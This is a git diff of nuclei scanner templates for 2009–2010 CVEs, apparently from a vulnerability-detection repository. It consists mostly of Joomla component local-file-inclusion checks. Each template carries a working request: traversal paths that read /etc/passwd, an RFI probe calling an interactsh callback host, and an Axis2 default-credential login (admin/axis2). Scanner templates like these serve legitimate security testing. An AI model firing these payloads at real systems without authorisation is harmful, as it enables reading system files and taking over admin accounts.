cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-1558.yaml b/nuclei-templates/CVE-2009/cve-2009-1558.yaml new file mode 100644 index 0000000000..c70f6219f8 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-1558.yaml @@ -0,0 +1,30 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + reference: + - https://www.exploit-db.com/exploits/32954 + - http://www.securityfocus.com/bid/34713 + - http://www.vupen.com/english/advisories/2009/1173 + - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ + classification: + cve-id: CVE-2009-1558 + tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-2100.yaml b/nuclei-templates/CVE-2009/cve-2009-2100.yaml new file mode 100644 index 0000000000..0b560673c6 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-2100.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + - http://www.securityfocus.com/bid/35378 + - http://osvdb.org/55176 + classification: + cve-id: CVE-2009-2100 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-3053.yaml b/nuclei-templates/CVE-2009/cve-2009-3053.yaml new file mode 100644 index 0000000000..7377bc684f --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-3053.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-3053 + +info: + name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. + reference: + - https://www.exploit-db.com/exploits/9564 + - https://www.cvedetails.com/cve/CVE-2009-3053 + - http://www.securityfocus.com/bid/36207 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 + classification: + cve-id: CVE-2009-3053 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-4202.yaml b/nuclei-templates/CVE-2009/cve-2009-4202.yaml new file mode 100644 index 0000000000..95e235cf67 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-4202.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + - http://www.vupen.com/english/advisories/2009/1494 + - http://www.securityfocus.com/bid/35201 + classification: + cve-id: CVE-2009-4202 + tags: cve,cve2009,joomla,lfi,photo + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-4223.yaml b/nuclei-templates/CVE-2009/cve-2009-4223.yaml deleted file mode 100644 index f6cfc51ae8..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-4223.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2009-4223 - -info: - name: KR-Web <= 1.1b2 RFI - author: geeknik - severity: high - description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. - reference: - - https://sourceforge.net/projects/krw/ - - https://www.exploit-db.com/exploits/10216 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395 - - http://www.exploit-db.com/exploits/10216 - classification: - cve-id: CVE-2009-4223 - tags: cve,cve2009,krweb,rfi - -requests: - - method: GET - path: - - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: interactsh_protocol - words: - - "http" diff --git a/nuclei-templates/CVE-2009/cve-2009-4679.yaml b/nuclei-templates/CVE-2009/cve-2009-4679.yaml new file mode 100644 index 0000000000..5f63aae9d3 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-4679.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-4679 + +info: + name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/33440 + - https://www.cvedetails.com/cve/CVE-2009-4679 + - http://secunia.com/advisories/37760 + - http://www.osvdb.org/61382 + classification: + cve-id: CVE-2009-4679 + tags: cve,cve2009,joomla,lfi,nexus + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0219.yaml b/nuclei-templates/CVE-2010/CVE-2010-0219.yaml deleted file mode 100644 index 9e44b7dcc9..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0219.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2010-0219 - -info: - name: Apache Axis2 Default Login - author: pikpikcu - severity: high - description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - tags: cve,cve2010,axis,apache,default-login,axis2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - classification: - cve-id: CVE-2010-0219 - -requests: - - raw: - - | - POST /axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginUsername={{username}}&loginPassword={{password}} - - - | - POST /axis2/axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userName={{username}}&password={{password}}&submit=+Login+ - - payloads: - username: - - admin - password: - - axis2 - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "

Welcome to Axis2 Web Admin Module !!

" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0696.yaml b/nuclei-templates/CVE-2010/CVE-2010-0696.yaml deleted file mode 100644 index 66f1da7c88..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0696.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-0696 - -info: - name: Joomla! Component Jw_allVideos - Arbitrary File Download - author: daffainfo - severity: high - description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/11447 - - https://www.cvedetails.com/cve/CVE-2010-0696 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml b/nuclei-templates/CVE-2010/CVE-2010-0944.yaml deleted file mode 100644 index c3838a761f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-0944 -info: - name: Joomla! Component com_jcollection - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11088 - - https://www.cvedetails.com/cve/CVE-2010-0944 - - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - - http://www.exploit-db.com/exploits/11088 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0944 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml b/nuclei-templates/CVE-2010/CVE-2010-0972.yaml deleted file mode 100644 index 59555acafe..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-0972 -info: - name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Apply all relevant security patches and product upgrades. - reference: - - https://www.exploit-db.com/exploits/11738 - - https://www.cvedetails.com/cve/CVE-2010-0972 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-0972 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml b/nuclei-templates/CVE-2010/CVE-2010-0982.yaml deleted file mode 100644 index 62c7d669aa..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-0982 - -info: - name: Joomla! Component com_cartweberp - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10942 - - https://www.cvedetails.com/cve/CVE-2010-0982 - - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ - - http://secunia.com/advisories/37917 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0982 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml b/nuclei-templates/CVE-2010/CVE-2010-0985.yaml deleted file mode 100644 index 27a096d30e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-0985 - -info: - name: Joomla! Component com_abbrev - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10948 - - https://www.cvedetails.com/cve/CVE-2010-0985 - - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560 - - http://www.securityfocus.com/bid/37560 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0985 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml b/nuclei-templates/CVE-2010/CVE-2010-1217.yaml deleted file mode 100644 index 641c05d517..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1217 - -info: - name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. - reference: - - https://www.exploit-db.com/exploits/11814 - - https://www.cvedetails.com/cve/CVE-2010-1217 - - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-1217 - tags: cve,cve2010,joomla,lfi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-1305.yaml b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1305.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1305.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1306.yaml b/nuclei-templates/CVE-2010/CVE-2010-1306.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1306.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1306.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1307.yaml b/nuclei-templates/CVE-2010/CVE-2010-1307.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1307.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1307.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1313.yaml b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml deleted file mode 100644 index 7a1ff39678..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1313.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1313 -info: - name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12082 - - https://www.cvedetails.com/cve/CVE-2010-1313 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1313 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1469.yaml b/nuclei-templates/CVE-2010/CVE-2010-1469.yaml deleted file mode 100644 index 545b5c6fa6..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1469.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1469 - -info: - name: Joomla! Component JProject Manager 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: | - - https://www.exploit-db.com/exploits/12146 - - https://www.cvedetails.com/cve/CVE-2010-1469 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1469 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml deleted file mode 100644 index 6cbaaf44ea..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1470 - -info: - name: Joomla! Component Web TV 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12166 - - https://www.cvedetails.com/cve/CVE-2010-1470 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1470 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml b/nuclei-templates/CVE-2010/CVE-2010-1473.yaml deleted file mode 100644 index 142fe4e823..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1473 - -info: - name: Joomla! Component Advertising 0.25 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12171 - - https://www.cvedetails.com/cve/CVE-2010-1473 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1473 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml deleted file mode 100644 index c3148da86e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2010-1475 - -info: - name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12147 - - https://www.cvedetails.com/cve/CVE-2010-1475 - classification: - cve-id: CVE-2010-1475 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/cve-2010-1476.yaml b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1476.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1476.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1491.yaml b/nuclei-templates/CVE-2010/CVE-2010-1491.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1491.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1491.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml b/nuclei-templates/CVE-2010/CVE-2010-1531.yaml deleted file mode 100644 index 5186a8ad9c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2010-1531 - -info: - name: Joomla! Component redSHOP 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12054 - - https://www.cvedetails.com/cve/CVE-2010-1531 - - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1531 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml b/nuclei-templates/CVE-2010/CVE-2010-1532.yaml deleted file mode 100644 index 79bd64b71f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1532 - -info: - name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 - - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://web.archive.org/web/20210127202836/https://www.securityfocus.com/bid/39348/ - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/cve-2010-1534.yaml b/nuclei-templates/CVE-2010/CVE-2010-1534.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1534.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1534.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml deleted file mode 100644 index 96f9e16d7f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1540 - -info: - name: Joomla! Component com_blog - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: - - https://www.exploit-db.com/exploits/11625 - - https://www.cvedetails.com/cve/CVE-2010-1540 - - http://secunia.com/advisories/38777 - - http://web.archive.org/web/20210121194559/https://www.securityfocus.com/bid/38530/ - classification: - cve-id: CVE-2010-1540 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2010/cve-2010-1601.yaml b/nuclei-templates/CVE-2010/CVE-2010-1601.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1601.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1601.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1602.yaml b/nuclei-templates/CVE-2010/CVE-2010-1602.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1602.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1602.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml deleted file mode 100644 index 46a8f7b565..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1653 - -info: - name: Joomla! Component Graphics 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12430 - - https://www.cvedetails.com/cve/CVE-2010-1653 - - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt - - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ - classification: - cve-id: CVE-2010-1653 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1714.yaml b/nuclei-templates/CVE-2010/CVE-2010-1714.yaml deleted file mode 100644 index 6470d09b21..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1714.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1714 -info: - name: Joomla! Component Arcade Games 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12168 - - https://www.cvedetails.com/cve/CVE-2010-1714 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1714 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml deleted file mode 100644 index 54a29f73dd..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1715 - -info: - name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12174 - - https://www.cvedetails.com/cve/CVE-2010-1715 - - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - - http://www.osvdb.org/63659 - classification: - cve-id: CVE-2010-1715 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/nuclei-templates/CVE-2010/cve-2010-1717.yaml b/nuclei-templates/CVE-2010/CVE-2010-1717.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1717.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1717.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml b/nuclei-templates/CVE-2010/CVE-2010-1718.yaml deleted file mode 100644 index 6be07b8c31..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml +++ /dev/null @@ -1,30 